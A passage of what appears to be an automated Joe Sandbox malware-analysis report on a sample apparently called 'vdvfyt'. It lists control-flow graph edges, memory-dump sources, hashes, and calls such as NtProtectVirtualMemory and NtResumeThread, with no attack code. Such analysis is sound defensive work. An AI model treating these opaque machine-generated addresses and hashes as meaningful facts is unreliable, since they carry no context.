6dc9ce9-6dc9cec 2040->2054 2055 6dc9cd3-6dc9cd9 2040->2055 2057 6dc9bf5-6dc9bf7 2049->2057 2058 6dc9bf3 2049->2058 2050->1955 2071 6dc9c86-6dc9c93 2051->2071 2072 6dc9c70-6dc9c76 2051->2072 2059 6dc9c4d 2052->2059 2060 6dc9c4f-6dc9c51 2052->2060 2054->2007 2056 6dc9cf2-6dc9d03 call 6dc6cc0 2054->2056 2063 6dc9cdd-6dc9cdf 2055->2063 2064 6dc9cdb 2055->2064 2075 6dc9d1b-6dc9d2b call 6dc6cc0 2056->2075 2076 6dc9d05-6dc9d0b 2056->2076 2057->2050 2058->2050 2059->2051 2060->2051 2062->1991 2063->2054 2064->2054 2066->2036 2079 6dc9b24-6dc9b28 2066->2079 2071->2040 2085 6dc9c95-6dc9ca3 call 6dc6cc0 2071->2085 2077 6dc9c78 2072->2077 2078 6dc9c7a-6dc9c7c 2072->2078 2089 6dc9d2d-6dc9d33 2075->2089 2090 6dc9d43-6dc9d50 2075->2090 2080 6dc9d0d 2076->2080 2081 6dc9d0f-6dc9d11 2076->2081 2077->2071 2078->2071 2079->1981 2086 6dc9b2e-6dc9b57 2079->2086 2080->2075 2081->2075 2096 6dc9cbb 2085->2096 2097 6dc9ca5-6dc9cab 2085->2097 2086->2036 2107 6dc9b59-6dc9b77 call 6dc5af0 2086->2107 2093 6dc9d35 2089->2093 2094 6dc9d37-6dc9d39 2089->2094 2090->2007 2098 6dc9d52-6dc9d63 call 6dc6cc0 2090->2098 2093->2090 2094->2090 2096->1955 2099 6dc9cad 2097->2099 2100 6dc9caf-6dc9cb1 2097->2100 2105 6dc9d7b 2098->2105 2106 6dc9d65-6dc9d6b 2098->2106 2099->2096 2100->2096 2105->1955 2108 6dc9d6d 2106->2108 2109 6dc9d6f-6dc9d71 2106->2109 2107->2036 2108->2105 2109->2105
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Pl]q$$]q
                                                                                                                                  • API String ID: 0-2369359564
                                                                                                                                  • Opcode ID: a10545414345263a62bddb037a0f107cdc2bcde21ad3817e1f703c8221c6e9e7
                                                                                                                                  • Instruction ID: b5f9a5e48bd5768583877015f354a402f266ce446d12ea83bf888d0a548ed6a1
                                                                                                                                  • Opcode Fuzzy Hash: a10545414345263a62bddb037a0f107cdc2bcde21ad3817e1f703c8221c6e9e7
                                                                                                                                  • Instruction Fuzzy Hash: 3E325974B4020A8FCB94DF29C5A4A6A77F6FF89720B1184A9E406DF3A5DB31DC41CB61

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2211 6dc19f9-6dc1a27 2214 6dc1a29-6dc1a2f 2211->2214 2215 6dc1a38-6dc1a39 2214->2215 2216 6dc1a31 2214->2216 2219 6dc1cbb-6dc1d00 2215->2219 2216->2215 2217 6dc1a3e-6dc1ad4 call 6dc1300 2216->2217 2218 6dc1ad9-6dc1b38 2216->2218 2216->2219 2220 6dc1c04-6dc1ca8 call 6dc1300 2216->2220 2221 6dc1bb5-6dc1bf3 2216->2221 2217->2214 2245 6dc1b44-6dc1ba2 2218->2245 2235 6dc1d0a-6dc1d0f 2219->2235 2236 6dc1d02-6dc1d08 2219->2236 2220->2214 2252 6dc1cae-6dc1cb6 2220->2252 2221->2214 2234 6dc1bf9-6dc1bff 2221->2234 2234->2214 2240 6dc1d14-6dc1d62 2235->2240 2241 6dc1d11-6dc1d12 2235->2241 2236->2235 2250 6dc1d6c-6dc1d71 2240->2250 2251 6dc1d64-6dc1d6a 2240->2251 2241->2240 2245->2214 2256 6dc1ba8-6dc1bb0 2245->2256 2254 6dc1d76-6dc1db5 2250->2254 2255 6dc1d73-6dc1d74 2250->2255 2251->2250 2252->2214 2259 6dc1db7-6dc1dbf 2254->2259 2260 6dc1dc1-6dc1dc7 2254->2260 2255->2254 2256->2214 2259->2260 2261 6dc1dc9 2260->2261 2262 6dc1dd0-6dc1dd1 2260->2262 2261->2262 2263 6dc1fbf-6dc1fc0 2261->2263 2264 6dc1ef6 2261->2264 2265 6dc20d0-6dc20d1 2261->2265 2266 6dc1e33-6dc1e47 2261->2266 2267 6dc1dd3-6dc1e29 2261->2267 2268 6dc20d3-6dc211e 2261->2268 2269 6dc1e4c-6dc1e69 2261->2269 2270 6dc202c-6dc2075 2261->2270 2271 6dc212b 2261->2271 2272 6dc1ea5-6dc1eea 2261->2272 2273 6dc2085 2261->2273 2274 6dc1f66-6dc1fb2 2261->2274 2275 6dc1ea2-6dc1ea3 2261->2275 2276 6dc2082-6dc2083 2261->2276 2262->2266 2295 6dc2017-6dc2020 2263->2295 2277 6dc1ef7 2264->2277 2279 6dc212c 2265->2279 2266->2260 2267->2260 2310 6dc1e2b-6dc1e31 2267->2310 2289 6dc20bb-6dc20c4 2268->2289 2309 6dc2120-6dc2129 2268->2309 2269->2272 2287 6dc1e6b-6dc1e84 2269->2287 2270->2295 2308 6dc2077-6dc2080 2270->2308 2271->2279 2294 6dc1e90-6dc1e96 2272->2294 2307 6dc1eec-6dc1ef4 2272->2307 2278 6dc2086 2273->2278 2285 6dc1f51-6dc1f5a 2274->2285 2311 6dc1fb4-6dc1fbd 2274->2311 2275->2277 2276->2278 2277->2285 2278->2289 2292 6dc212d 2279->2292 2290 6dc1f5c 2285->2290 2291 6dc1f63-6dc1f64 2285->2291 2293 6dc1e86-6dc1e8e 2287->2293 2287->2294 2301 6dc20cd-6dc20ce 2289->2301 2302 6dc20c6 2289->2302 2290->2263 2290->2265 2290->2268 2290->2270 2290->2271 2290->2273 2290->2274 2290->2276 2291->2263 2291->2274 2292->2292 2293->2294 2303 6dc1e9f-6dc1ea0 2294->2303 2304 6dc1e98 2294->2304 2305 6dc2029-6dc202a 2295->2305 2306 6dc2022 2295->2306 2301->2265 2301->2268 2302->2265 2302->2268 2302->2271 2303->2272 2304->2263 2304->2264 2304->2265 2304->2268 2304->2270 2304->2271 2304->2272 2304->2273 2304->2274 2304->2275 2304->2276 2304->2303 2305->2270 2305->2273 2306->2265 2306->2268 2306->2270 2306->2271 2306->2273 2306->2276 2307->2294 2308->2295 2309->2289 2310->2260 2311->2285
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q$ssd
                                                                                                                                  • API String ID: 0-2907924804
                                                                                                                                  • Opcode ID: e63ec62f09068252b2d9f14bc599997d34c5d2c1089d9252a88eff6301ef2238
                                                                                                                                  • Instruction ID: 51e34d6f8fb80ebbef50ac2947ba16ddd4ae64aec420bde21e116911fb699253
                                                                                                                                  • Opcode Fuzzy Hash: e63ec62f09068252b2d9f14bc599997d34c5d2c1089d9252a88eff6301ef2238
                                                                                                                                  • Instruction Fuzzy Hash: C1022970E05229CFEB64DF68C844BA9B7B2FB4A314F1092A9D449E7346DB709E85CF50
                                                                                                                                  APIs
                                                                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0618ED61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511948888.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6180000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                  • Opcode ID: e641aa63deb803e7a970b1817ce822d4efc005548aaaaaeb332790ba6ac7e4b1
                                                                                                                                  • Instruction ID: 519269ba4ffa6f1d917597be8f19cd744466f39a118e099fc799cbee2a093f01
                                                                                                                                  • Opcode Fuzzy Hash: e641aa63deb803e7a970b1817ce822d4efc005548aaaaaeb332790ba6ac7e4b1
                                                                                                                                  • Instruction Fuzzy Hash: A021F3B1D013499FCB10DFAAD984AEEFBF5FF48310F20842AE559A7210D7759944CBA1
                                                                                                                                  APIs
                                                                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0618ED61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511948888.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6180000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                  • Opcode ID: 10895c2482b53d47fff5df14888131e3cd97031794adb96c40caf04bf75066c9
                                                                                                                                  • Instruction ID: 76af5b87e0b0450e023e891cc07f010277f3ece7396d6b62eb13e2e016a063e9
                                                                                                                                  • Opcode Fuzzy Hash: 10895c2482b53d47fff5df14888131e3cd97031794adb96c40caf04bf75066c9
                                                                                                                                  • Instruction Fuzzy Hash: 1B21D2B1D012499FCB10DFAAD984AEEFBF5FF48310F60842AE519A7250C775A944CBA1
                                                                                                                                  APIs
                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 06160C2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511920080.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6160000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: a90d99d6129b1e748c784a3c78bf58d0575b2964029accdfc3bc1d2594b70e14
                                                                                                                                  • Instruction ID: 1cf83154333089129fccb3dda3e79108131d9b219dc7d8e8369759812e35fc40
                                                                                                                                  • Opcode Fuzzy Hash: a90d99d6129b1e748c784a3c78bf58d0575b2964029accdfc3bc1d2594b70e14
                                                                                                                                  • Instruction Fuzzy Hash: 771108B5D002498ECB10DFAAC9446EEFBF4FF49314F10842AD459A7240C7789945CFA1
                                                                                                                                  APIs
                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 06160C2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511920080.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6160000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: 8bf72df189d4d4064a3efb3805c83e2bb3a2b34169667827f459840fdf61c857
                                                                                                                                  • Instruction ID: 17748c028324d1345b1b5f4a666aba8fb53ffb1feca8400137ee04397cca5225
                                                                                                                                  • Opcode Fuzzy Hash: 8bf72df189d4d4064a3efb3805c83e2bb3a2b34169667827f459840fdf61c857
                                                                                                                                  • Instruction Fuzzy Hash: 8911F6B5D003098FDB14DFAAC584AAEFBF4FF49314F60842AD519A7240CB78A945CFA5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514001317.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c80000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q
                                                                                                                                  • API String ID: 0-52440209
                                                                                                                                  • Opcode ID: d6efcd4da095c099fc327a24660cdc817ab55b3c4bc08d6557f66f85b03c5bb4
                                                                                                                                  • Instruction ID: d6522a35d49ad7ce140f4f041856a87bc154fcbfbc37423aa3496873425cee6e
                                                                                                                                  • Opcode Fuzzy Hash: d6efcd4da095c099fc327a24660cdc817ab55b3c4bc08d6557f66f85b03c5bb4
                                                                                                                                  • Instruction Fuzzy Hash: 9EB10774E05218CFEB64DFAAD984BADBBF2BF89304F909169D009EB655D7309984CF00
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514001317.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c80000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 75b35dc6bbbd17d2af2ecf49f8dbf1c54a6a3bef3f757d92f2d6b3f8e7581aa6
                                                                                                                                  • Instruction ID: cf11e2b6ed5ceea2b85c4273aa8bf6f8e3aaff3401e4b3a10a6684589032697a
                                                                                                                                  • Opcode Fuzzy Hash: 75b35dc6bbbd17d2af2ecf49f8dbf1c54a6a3bef3f757d92f2d6b3f8e7581aa6
                                                                                                                                  • Instruction Fuzzy Hash: F7911A70D05218CFEB64DF66D844BADB7F2FB4A308F2491AAD009AB251EB745E85CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1345 6c41330-6c41341 1346 6c41343 1345->1346 1347 6c41348-6c4134f 1345->1347 1346->1347 1348 6c41356-6c413a1 1347->1348 1349 6c41351 1347->1349 1351 6c413a3 1348->1351 1352 6c413a8-6c413af 1348->1352 1349->1348 1351->1352 1353 6c413b6-6c41406 1352->1353 1354 6c413b1 1352->1354 1358 6c4140d-6c41414 1353->1358 1359 6c41408 1353->1359 1354->1353 1360 6c41416 1358->1360 1361 6c4141b-6c41471 1358->1361 1359->1358 1360->1361 1363 6c41473 1361->1363 1364 6c41478-6c4147f 1361->1364 1363->1364 1365 6c41486-6c414d1 1364->1365 1366 6c41481 1364->1366 1368 6c414d3 1365->1368 1369 6c414d8-6c414df 1365->1369 1366->1365 1368->1369 1370 6c414e6-6c41531 1369->1370 1371 6c414e1 1369->1371 1373 6c41533 1370->1373 1374 6c41538-6c4153f 1370->1374 1371->1370 1373->1374 1375 6c41546-6c41596 1374->1375 1376 6c41541 1374->1376 1379 6c4159d-6c415a4 1375->1379 1380 6c41598 1375->1380 1376->1375 1381 6c415a6 1379->1381 1382 6c415ab-6c415f9 1379->1382 1380->1379 1381->1382 1384 6c41600-6c41607 1382->1384 1385 6c415fb 1382->1385 1386 6c4160e-6c41659 1384->1386 1387 6c41609 1384->1387 1385->1384 1389 6c41660-6c41667 1386->1389 1390 6c4165b 1386->1390 1387->1386 1391 6c4166e-6c416be 1389->1391 1392 6c41669 1389->1392 1390->1389 1394 6c416c5-6c416cc 1391->1394 1395 6c416c0 1391->1395 1392->1391 1396 6c416d3-6c41721 1394->1396 1397 6c416ce 1394->1397 1395->1394 1399 6c41723 1396->1399 1400 6c41728-6c4172f 1396->1400 1397->1396 1399->1400 1401 6c41736-6c41786 1400->1401 1402 6c41731 1400->1402 1404 6c4178d-6c41794 1401->1404 1405 6c41788 1401->1405 1402->1401 1406 6c41796 1404->1406 1407 6c4179b-6c417ee 1404->1407 1405->1404 1406->1407 1409 6c417f5-6c417fc 1407->1409 1410 6c417f0 1407->1410 1411 6c41803-6c41856 1409->1411 1412 6c417fe 1409->1412 1410->1409 1414 6c4185d-6c41864 1411->1414 1415 6c41858 1411->1415 1412->1411 1416 6c41866 1414->1416 1417 6c4186b-6c418b9 1414->1417 1415->1414 1416->1417 1419 6c418c0-6c418c7 1417->1419 1420 6c418bb 1417->1420 1421 6c418ce-6c41919 1419->1421 1422 6c418c9 1419->1422 1420->1419 1424 6c41920-6c41927 1421->1424 1425 6c4191b 1421->1425 1422->1421 1426 6c4192e-6c41979 1424->1426 1427 6c41929 1424->1427 1425->1424 1429 6c41980-6c41987 1426->1429 1430 6c4197b 1426->1430 1427->1426 1431 6c4198e-6c419d9 1429->1431 1432 6c41989 1429->1432 1430->1429 1434 6c419e0-6c419e7 1431->1434 1435 6c419db 1431->1435 1432->1431 1436 6c419ee-6c41a20 1434->1436 1437 6c419e9 1434->1437 1435->1434 1439 6c41a40 1436->1439 1440 6c41a22-6c41a3e 1436->1440 1437->1436 1441 6c41a45-6c41a4c 1439->1441 1440->1439 1440->1441 1442 6c41a53-6c41a88 1441->1442 1443 6c41a4e 1441->1443 1445 6c41aa7-6c41aac 1442->1445 1446 6c41a8a-6c41aa6 1442->1446 1443->1442 1447 6c41aad-6c41ab4 1445->1447 1446->1447 1448 6c41aa8 1446->1448 1450 6c41ab6 1447->1450 1451 6c41abb-6c41b0e 1447->1451 1448->1447 1450->1451 1453 6c41b15-6c41b1c 1451->1453 1454 6c41b10 1451->1454 1455 6c41b23-6c41b76 1453->1455 1456 6c41b1e 1453->1456 1454->1453 1459 6c41b7d-6c41b84 1455->1459 1460 6c41b78 1455->1460 1456->1455 1461 6c41b86 1459->1461 1462 6c41b8b-6c41bd9 1459->1462 1460->1459 1461->1462 1464 6c41be0-6c41be7 1462->1464 1465 6c41bdb 1462->1465 1466 6c41bee-6c41c39 1464->1466 1467 6c41be9 1464->1467 1465->1464 1469 6c41c40-6c41c47 1466->1469 1470 6c41c3b 1466->1470 1467->1466 1471 6c41c4e-6c41c9e 1469->1471 1472 6c41c49 1469->1472 1470->1469 1474 6c41ca5-6c41cac 1471->1474 1475 6c41ca0 1471->1475 1472->1471 1476 6c41cb3-6c41d06 1474->1476 1477 6c41cae 1474->1477 1475->1474 1479 6c41d0d-6c41d14 1476->1479 1480 6c41d08 1476->1480 1477->1476 1481 6c41d16 1479->1481 1482 6c41d1b-6c41d69 1479->1482 1480->1479 1481->1482 1484 6c41d70-6c41d77 1482->1484 1485 6c41d6b 1482->1485 1486 6c41d7e-6c41dc9 1484->1486 1487 6c41d79 1484->1487 1485->1484 1489 6c41dd0-6c41dd7 1486->1489 1490 6c41dcb 1486->1490 1487->1486 1491 6c41dde-6c41e2e 1489->1491 1492 6c41dd9 1489->1492 1490->1489 1494 6c41e35-6c41e3c 1491->1494 1495 6c41e30 1491->1495 1492->1491 1496 6c41e43-6c41ea1 1494->1496 1497 6c41e3e 1494->1497 1495->1494 1497->1496
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2513733584.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c40000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: bc768112516f7fde4de29a3b9c705c2870b9f77dd1cac3cf3e43ef9aca6e7c0e
                                                                                                                                  • Instruction ID: 0cf542450424e6e59ff8bbf07498aa198cf22101cd50210356a7299974a2557e
                                                                                                                                  • Opcode Fuzzy Hash: bc768112516f7fde4de29a3b9c705c2870b9f77dd1cac3cf3e43ef9aca6e7c0e
                                                                                                                                  • Instruction Fuzzy Hash: 6DE2D170D09388DFDB56DBB5CC58BAE7FB5EF46300F18809AE140AB2A2C7785945CB61

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1500 6dcb9a8-6dcb9d0 1502 6dcba1e-6dcba2c 1500->1502 1503 6dcb9d2-6dcba19 1500->1503 1504 6dcba2e-6dcba39 call 6dc98d0 1502->1504 1505 6dcba3b 1502->1505 1553 6dcbe75-6dcbe7c 1503->1553 1508 6dcba3d-6dcba44 1504->1508 1505->1508 1510 6dcbb2d-6dcbb31 1508->1510 1511 6dcba4a-6dcba4e 1508->1511 1515 6dcbb87-6dcbb91 1510->1515 1516 6dcbb33-6dcbb42 call 6dc76e0 1510->1516 1513 6dcbe7d-6dcbea5 1511->1513 1514 6dcba54-6dcba58 1511->1514 1525 6dcbeac-6dcbed6 1513->1525 1518 6dcba6a-6dcbac8 call 6dc9610 call 6dca078 1514->1518 1519 6dcba5a-6dcba64 1514->1519 1520 6dcbbca-6dcbbf0 1515->1520 1521 6dcbb93-6dcbba2 call 6dc6e98 1515->1521 1528 6dcbb46-6dcbb4b 1516->1528 1560 6dcbace-6dcbb28 1518->1560 1561 6dcbf3b-6dcbf65 1518->1561 1519->1518 1519->1525 1545 6dcbbfd 1520->1545 1546 6dcbbf2-6dcbbfb 1520->1546 1537 6dcbede-6dcbef4 1521->1537 1538 6dcbba8-6dcbbc5 1521->1538 1525->1537 1532 6dcbb4d-6dcbb82 call 6dcb878 1528->1532 1533 6dcbb44 1528->1533 1532->1553 1533->1528 1563 6dcbefc-6dcbf34 1537->1563 1538->1553 1552 6dcbbff-6dcbc27 1545->1552 1546->1552 1565 6dcbc2d-6dcbc3b 1552->1565 1566 6dcbcf8-6dcbcfc 1552->1566 1560->1553 1570 6dcbf6f-6dcbf75 1561->1570 1571 6dcbf67-6dcbf6d 1561->1571 1563->1561 1584 6dcbc44-6dcbc46 1565->1584 1572 6dcbcfe-6dcbd17 1566->1572 1573 6dcbd76-6dcbd80 1566->1573 1571->1570 1578 6dcbf76-6dcbfb3 1571->1578 1572->1573 1596 6dcbd19-6dcbd28 call 6dc6cc0 1572->1596 1575 6dcbddd-6dcbde6 1573->1575 1576 6dcbd82-6dcbd8c 1573->1576 1580 6dcbe1e-6dcbe6b 1575->1580 1581 6dcbde8-6dcbe16 call 6dc8e20 call 6dc8e40 1575->1581 1592 6dcbd8e-6dcbd90 1576->1592 1593 6dcbd92-6dcbda4 1576->1593 1601 6dcbe73 1580->1601 1581->1580 1584->1566 1591 6dcbc4c-6dcbc5b call 6dc6cc0 1584->1591 1610 6dcbc5d-6dcbc63 1591->1610 1611 6dcbc73-6dcbc88 1591->1611 1599 6dcbda6-6dcbda8 1592->1599 1593->1599 1617 6dcbd2a-6dcbd30 1596->1617 1618 6dcbd40-6dcbd4b 1596->1618 1607 6dcbdaa-6dcbdae 1599->1607 1608 6dcbdd6-6dcbddb 1599->1608 1601->1553 1613 6dcbdcc-6dcbdd1 call 6dc5ac0 1607->1613 1614 6dcbdb0-6dcbdc9 1607->1614 1608->1575 1608->1576 1619 6dcbc65 1610->1619 1620 6dcbc67-6dcbc69 1610->1620 1624 6dcbcbc-6dcbcc5 1611->1624 1625 6dcbc8a-6dcbcb6 call 6dc7f70 1611->1625 1613->1608 1614->1613 1627 6dcbd34-6dcbd36 1617->1627 1628 6dcbd32 1617->1628 1618->1561 1629 6dcbd51-6dcbd74 1618->1629 1619->1611 1620->1611 1624->1561 1626 6dcbccb-6dcbcf2 1624->1626 1625->1563 1625->1624 1626->1566 1626->1591 1627->1618 1628->1618 1629->1573 1629->1596
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Haq$Haq$Haq
                                                                                                                                  • API String ID: 0-3013282719
                                                                                                                                  • Opcode ID: 5a0df07d81303679410f39364b39b49b890bd3651d0bdbe1b1481011026ebd07
                                                                                                                                  • Instruction ID: f59c3477efc0abf7222a94625d62b9df5a56ab9717c66f635bbafff895011952
                                                                                                                                  • Opcode Fuzzy Hash: 5a0df07d81303679410f39364b39b49b890bd3651d0bdbe1b1481011026ebd07
                                                                                                                                  • Instruction Fuzzy Hash: 40126C70A006098FCB54DFA9C495A6EBBF6FF84310F14852DE5469B3A5DB31EC46CBA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1642 6dcd660-6dcd69d 1644 6dcd6bf-6dcd6d5 call 6dcd468 1642->1644 1645 6dcd69f-6dcd6a2 1642->1645 1651 6dcda4b-6dcda5f 1644->1651 1652 6dcd6db-6dcd6e7 1644->1652 1758 6dcd6a4 call 6dcdf68 1645->1758 1759 6dcd6a4 call 6dcdfd0 1645->1759 1647 6dcd6aa-6dcd6ac 1647->1644 1649 6dcd6ae-6dcd6b6 1647->1649 1649->1644 1659 6dcda9f-6dcdaa8 1651->1659 1653 6dcd6ed-6dcd6f0 1652->1653 1654 6dcd818-6dcd81f 1652->1654 1655 6dcd6f3-6dcd6fc 1653->1655 1656 6dcd94e-6dcda0b call 6dcce70 call 6dcfe00 call 6dcce70 call 6dcfe00 1654->1656 1657 6dcd825-6dcd82e 1654->1657 1660 6dcdb40 1655->1660 1661 6dcd702-6dcd716 1655->1661 1736 6dcda11-6dcda42 1656->1736 1657->1656 1663 6dcd834-6dcd940 call 6dcce70 call 6dcd400 call 6dcce70 1657->1663 1664 6dcda6d-6dcda76 1659->1664 1665 6dcdaaa-6dcdab1 1659->1665 1672 6dcdb45-6dcdb49 1660->1672 1677 6dcd71c-6dcd7b1 call 6dcd468 * 2 call 6dcce70 call 6dcd400 call 6dcd4a8 call 6dcd550 call 6dcd5b8 1661->1677 1678 6dcd808-6dcd812 1661->1678 1754 6dcd94b-6dcd94c 1663->1754 1755 6dcd942 1663->1755 1664->1660 1667 6dcda7c-6dcda8e 1664->1667 1669 6dcdaff-6dcdb06 1665->1669 1670 6dcdab3-6dcdaf6 call 6dcce70 1665->1670 1687 6dcda9e 1667->1687 1688 6dcda90-6dcda98 call 6e7fbd8 1667->1688 1675 6dcdb08-6dcdb18 1669->1675 1676 6dcdb2b-6dcdb3e 1669->1676 1670->1669 1673 6dcdb4b 1672->1673 1674 6dcdb54 1672->1674 1673->1674 1686 6dcdb55 1674->1686 1675->1676 1692 6dcdb1a-6dcdb22 1675->1692 1676->1672 1734 6dcd7d0-6dcd803 call 6dcd5b8 1677->1734 1735 6dcd7b3-6dcd7cb call 6dcd550 call 6dcce70 call 6dcd120 1677->1735 1678->1654 1678->1655 1686->1686 1687->1659 1688->1687 1692->1676 1734->1678 1735->1734 1736->1651 1754->1656 1755->1754 1758->1647 1759->1647
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q$4']q
                                                                                                                                  • API String ID: 0-705557208
                                                                                                                                  • Opcode ID: 393b32890e322f7c780a53bcbba81b5a17e701994b506f5c28812efff260db91
                                                                                                                                  • Instruction ID: 70b8b57a7dbba1dfca950446c9712002c4e4279b544b2b4c63bfe1df928de231
                                                                                                                                  • Opcode Fuzzy Hash: 393b32890e322f7c780a53bcbba81b5a17e701994b506f5c28812efff260db91
                                                                                                                                  • Instruction Fuzzy Hash: EEF1C934A10219DFCB48DFA4D998E9DBBB2FF89310F158168E506AB365DB71EC42CB50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1860 6dca078-6dca08a 1861 6dca08c-6dca0ac 1860->1861 1862 6dca0c2-6dca0e7 1860->1862 1869 6dca0ee-6dca142 1861->1869 1870 6dca0ae-6dca0bf 1861->1870 1862->1869 1876 6dca148-6dca154 1869->1876 1877 6dca1e9-6dca237 1869->1877 1880 6dca15e-6dca164 call 6dc5400 1876->1880 1881 6dca156-6dca15d 1876->1881 1890 6dca239-6dca25d 1877->1890 1891 6dca267-6dca26d 1877->1891 1884 6dca169-6dca172 1880->1884 1886 6dca174-6dca199 1884->1886 1887 6dca1e1-6dca1e8 1884->1887 1897 6dca1dc-6dca1df 1886->1897 1898 6dca19b-6dca1b5 1886->1898 1890->1891 1892 6dca25f 1890->1892 1893 6dca27f-6dca28e 1891->1893 1894 6dca26f-6dca27c 1891->1894 1892->1891 1897->1886 1897->1887 1898->1897 1900 6dca1b7-6dca1c0 1898->1900 1901 6dca1cf-6dca1db 1900->1901 1902 6dca1c2-6dca1c5 1900->1902 1902->1901
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$(aq$(aq
                                                                                                                                  • API String ID: 0-2593664646
